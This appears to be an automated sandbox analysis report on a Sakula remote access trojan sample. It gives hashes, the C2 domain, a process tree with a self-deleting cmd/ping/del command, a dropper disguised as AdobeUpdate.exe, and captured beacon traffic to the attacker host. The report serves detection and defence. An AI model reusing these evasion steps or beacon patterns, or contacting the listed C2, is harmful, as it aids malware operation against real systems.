Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64, arch:x86, image:win7-20241023-en, locale:en-us, os:windows7-x64, system
  • submitted
    01/02/2025, 12:34 UTC

General

  • Target

    7cdb15b4ed3ac8a3c20a67a12b320e7551a101b7c42054fe77b5521238681d3e.exe

  • Size

    92KB

  • MD5

    af9c2ef84126a4db946fab35fc7d38b1

  • SHA1

    30e07ab93c52099ed5273f45c7ecf26c3d51ed5e

  • SHA256

    7cdb15b4ed3ac8a3c20a67a12b320e7551a101b7c42054fe77b5521238681d3e

  • SHA512

    4988952148675816663191fe9fc9cefbb6539a214bdcafcb865464cfcce80820c5db34a3e4a83ce792d43040913ad6d626c7b90f8c1b6a54a27feede2d82aa2d

  • SSDEEP

    1536:TJbCiJVkgMaT2itTkjoRXnM48dXFajVPYxCEtkz30rtrC:9bfVk29te2jqxCEtg30BO

Malware Config

Extracted

Family

sakula

C2

www.savmpet.com

Signatures

  • Sakula

    Sakula is a remote access trojan with various capabilities.

  • Sakula family
  • Sakula payload 1 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7cdb15b4ed3ac8a3c20a67a12b320e7551a101b7c42054fe77b5521238681d3e.exe
    "C:\Users\Admin\AppData\Local\Temp\7cdb15b4ed3ac8a3c20a67a12b320e7551a101b7c42054fe77b5521238681d3e.exe"
    1⤵
    • Loads dropped DLL
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:588
    • C:\Users\Admin\AppData\Local\Temp\MicroMedia\AdobeUpdate.exe
      C:\Users\Admin\AppData\Local\Temp\MicroMedia\AdobeUpdate.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:2348
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 & del /q "C:\Users\Admin\AppData\Local\Temp\7cdb15b4ed3ac8a3c20a67a12b320e7551a101b7c42054fe77b5521238681d3e.exe"
      2⤵
      • Deletes itself
      • System Location Discovery: System Language Discovery
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:2700
      • C:\Windows\SysWOW64\PING.EXE
        ping 127.0.0.1
        3⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:2324

Network

  • US
    DNS
    www.savmpet.com
    AdobeUpdate.exe
    Remote address:
    8.8.8.8:53
    Request
    www.savmpet.com
    IN A
    Response
    www.savmpet.com
    IN A
    52.34.198.229
  • US
    POST
    http://www.savmpet.com/newimage.asp?imageid=cwpfqzec-1909178559&type=0&resid=259444420
    AdobeUpdate.exe
    Remote address:
    52.34.198.229:80
    Request
    POST /newimage.asp?imageid=cwpfqzec-1909178559&type=0&resid=259444420 HTTP/1.1
    User-Agent: iexplorer
    Host: www.savmpet.com
    Content-Length: 176
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 01 Feb 2025 12:34:19 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=; path=/; domain=.www.savmpet.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: btst=; path=/; domain=www.savmpet.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: btst=ce7167a7a785479c822349ddfded9303|181.215.176.83|1738413259|1738413259|0|1|0; path=/; domain=.savmpet.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  • US
    GET
    http://www.savmpet.com/photo/cwpfqzec-1909178559.jpg?resid=259447805
    AdobeUpdate.exe
    Remote address:
    52.34.198.229:80
    Request
    GET /photo/cwpfqzec-1909178559.jpg?resid=259447805 HTTP/1.1
    User-Agent: iexplorer
    Host: www.savmpet.com
    Cache-Control: no-cache
    Cookie: btst=ce7167a7a785479c822349ddfded9303|181.215.176.83|1738413259|1738413259|0|1|0; snkz=181.215.176.83
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 01 Feb 2025 12:34:19 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=; path=/; domain=.www.savmpet.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: btst=; path=/; domain=www.savmpet.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: btst=ce7167a7a785479c822349ddfded9303|181.215.176.83|1738413259|1738413259|0|2|0; path=/; domain=.savmpet.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  • 52.34.198.229:80
    http://www.savmpet.com/newimage.asp?imageid=cwpfqzec-1909178559&type=0&resid=259444420
    http
    AdobeUpdate.exe
    580 B
    872 B
    5
    5

    HTTP Request

    POST http://www.savmpet.com/newimage.asp?imageid=cwpfqzec-1909178559&type=0&resid=259444420

    HTTP Response

    200
  • 52.34.198.229:80
    http://www.savmpet.com/photo/cwpfqzec-1909178559.jpg?resid=259447805
    http
    AdobeUpdate.exe
    475 B
    792 B
    5
    5

    HTTP Request

    GET http://www.savmpet.com/photo/cwpfqzec-1909178559.jpg?resid=259447805

    HTTP Response

    200
  • 52.34.198.229:80
    www.savmpet.com
    AdobeUpdate.exe
    152 B
    3
  • 52.34.198.229:80
    www.savmpet.com
    AdobeUpdate.exe
    152 B
    3
  • 52.34.198.229:80
    www.savmpet.com
    AdobeUpdate.exe
    152 B
    3
  • 8.8.8.8:53
    www.savmpet.com
    dns
    AdobeUpdate.exe
    61 B
    77 B
    1
    1

    DNS Request

    www.savmpet.com

    DNS Response

    52.34.198.229

MITRE ATT&CK Enterprise v15

Downloads

  • \Users\Admin\AppData\Local\Temp\MicroMedia\AdobeUpdate.exe

    Filesize

    92KB

    MD5

    442967e1ca0a0d8408004088db487be4

    SHA1

    63faab4d648ffce4e429fdb5b376d64a72bf5469

    SHA256

    db4de96bcbc462c200b08eab0d3e24a55bc4713e5dd6e99c08639dac3f800894

    SHA512

    acee3765a0db149f63c1876faf928e8a4eef051b8d5426532dda02f0ea24208601eb20f93db98348fd8fbba04acdfa46c9287612e85b28db668f2633131fa983
